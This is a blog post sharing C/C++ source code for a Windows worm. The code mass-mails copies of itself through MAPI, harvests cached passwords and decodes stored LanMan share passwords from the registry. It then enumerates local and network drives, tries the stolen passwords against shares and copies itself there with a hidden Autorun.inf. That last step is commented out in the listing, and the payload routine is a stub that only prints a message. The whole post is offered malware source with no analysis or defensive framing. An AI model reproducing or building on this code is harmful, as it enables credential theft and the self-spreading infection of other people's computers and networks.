for( int i=0 ; i<recipNum ; i++ )
{
recips[i].ulReserved = 0;
recips[i].ulRecipClass = MAPI_TO;
recips[i].lpszName = addressList[i];
recips[i].lpszAddress = addressList[i];
recips[i].ulEIDSize = 0;
recips[i].lpEntryID = NULL;
}
MapiMessage note = { 0, "The Subjext", "The Message Text", NULL, NULL, NULL, 0, NULL, recipNum, recips, 1, &attachment};
if( MAPISendMail( lhSession, 0L, ¬e, 0L, 0L) != SUCCESS_SUCCESS )
{
return -1;
}
free( recips );
return 0;
}
//----------------------------------------------------------------------------//
int CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)
{
memmove(buf, x->abResource+x->cbResource, x->cbPassword);
buf[x->cbPassword] = 0;
addPassword( buf );
return 0;
}
//----------------------------------------------------------------------------//
int getCachedPasswords( void )
{
buf = new char[1024];
HINSTANCE hi = LoadLibrary("mpr.dll");
if( hi == NULL )
{
return -1;
}
WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");
if( enp == NULL )
{
return -1;
}
enp( 0, 0, 0xff, pce, 0);
FreeLibrary( hi );
return 0;
}
//----------------------------------------------------------------------------//
BYTE rotr( BYTE b )
{
BYTE carry;
carry = b & 0x01;
carry <<= 7;
b >>= 1;
b |= carry;
return b;
}
//----------------------------------------------------------------------------//
void decodePW( char * pw )
{
BYTE hash = 0x35;
while( pw && *pw )
{
*pw = *pw ^ hash;
pw++;
hash = rotr( hash );
}
}
//----------------------------------------------------------------------------//
int addPassword( char * pwd )
{
if( (strlen(pwd) > 0) && (strlen(pwd) < MAX_LENGTH) )
{
strcpy( passwordList[ index ], pwd);
printf("DEBUG: ADDED: %s\n", passwordList[ index ]);
index++;
}
return 0;
}
//----------------------------------------------------------------------------//
int getSharePasswords( void ){
if( runningNT() == FALSE )
{
HKEY key, subkey;
DWORD i, maxKeys, len, junk;
char keyName[256], wrightPwd[256], readPwd[256];
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan", 0, NULL, &key);
RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL);
if( maxKeys != 0 )
{
for( i=0; i<maxKeys; i++ )
{
RegEnumKey(key, i, keyName, 256);
RegOpenKeyEx(key, keyName, 0, NULL, &subkey);
wrightPwd[0] = readPwd[0] = 0;
len = 256;
RegQueryValueEx(subkey, "Parm1enc", NULL, &junk, (BYTE *)wrightPwd, &len);
wrightPwd[len] = 0;
decodePW(wrightPwd);
addPassword( wrightPwd );
len = 256;
RegQueryValueEx(subkey, "Parm2enc", NULL, &junk, (BYTE *)readPwd, &len);
readPwd[len] = 0;
decodePW(readPwd);
addPassword( readPwd );
}
}
RegCloseKey(subkey);
RegCloseKey(key);
}
return 0;
}
//----------------------------------------------------------------------------//
void propogateDrive( void )
{
int length;
char buff[MAX_LENGTH], *ptr;
ptr = buff;
length = GetLogicalDriveStrings( MAX_LENGTH, ptr) ;
if( length > 0 && length < MAX_LENGTH)
{
for( int i=0 ; i<=(length/4) ; i++ )
{
switch( GetDriveType( ptr ) )
{
case DRIVE_FIXED:
// The drive is a local drive.
printf("DRIVE_FIXED: %s\n", ptr);
attackDrive( ptr, 1 );
break;
case DRIVE_REMOTE:
// The drive is a network drive.
printf("DRIVE_REMOTE: %s\n", ptr);
attackDrive( ptr, 1 );
break;
default:
break;
}
*ptr+=1;
}
}
return;
}
//----------------------------------------------------------------------------//
void attackDrive( char * drive, int type )
{
FILE *fpAutorun;
char buff[MAX_LENGTH];
// copy worm to drive, Attribute = hidden
if( type == 1 )
{
sprintf( buff, "%s%s", drive, EARTH_WORM_JIM);
} else {
sprintf( buff, "%s\\%s", drive, EARTH_WORM_JIM);
}
printf("DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n", drive, buff);
/* if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 )
{
// create an Autorun.inf file on drive, Attribute = hidden
sprintf( buff, "%sAutorun.inf", drive);
fpAutorun = fopen(buff, "w");
if( fpAutorun != NULL )
{
fprintf( fpAutorun, "[Autorun]\nOPEN=%s\n", EARTH_WORM_JIM);
fclose( fpAutorun );
_rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY);
}
} */
return;
}
//----------------------------------------------------------------------------//
void propogateNet( LPNETRESOURCE lpnr )
{
DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF;
HANDLE hEnum;
LPNETRESOURCE lpnrLocal;
dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum);
if( dwResult != NO_ERROR )
{
return;
}
do
{
lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer);
dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer);
if ( dwResultEnum == NO_ERROR )
{
for( DWORD i = 0; i < cEntries; i++ )
{
if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) )
{
propogateNet( &lpnrLocal[i] );
} else if( RESOURCETYPE_DISK == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) )
{
if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD )
{
// try all found password/username combinations...
printf("ERROR_INVALID_PASSWORD "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );
if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 )
{
attackDrive( lpnrLocal[i].lpRemoteName, 0 );
WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
}
} else {
attackDrive( lpnrLocal[i].lpRemoteName, 0 );
WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
printf("ACCESS NOT DENIED "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );
}
}
}
} else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) {
break;
}
} while( dwResultEnum != ERROR_NO_MORE_ITEMS );
GlobalFree( (HGLOBAL) lpnrLocal );
WNetCloseEnum( hEnum );
return;
}
//----------------------------------------------------------------------------//
int crackNetShare( char * share )
{
int retval = 0;
for( int i=0 ; i<index ; i++ )
{
retval = WNetAddConnection( share , passwordList[i], NULL );
if( retval == NO_ERROR && retval != ERROR_INVALID_PASSWORD ) // <----- !!! dodgy testing, fix it
{
printf("PASS CRACKED: %s : %s\n", share , passwordList[i]);
return 0;
}
}
return -1;
}
//----------------------------------------------------------------------------//
void releasePayload()
{
printf("\n\t!!! PAYLOAD !!!\n");
return;
}
//----------------------------------------------------------------------------//
A
Posted by egunda at 10:19 PM 0 comments
Labels: Source Codes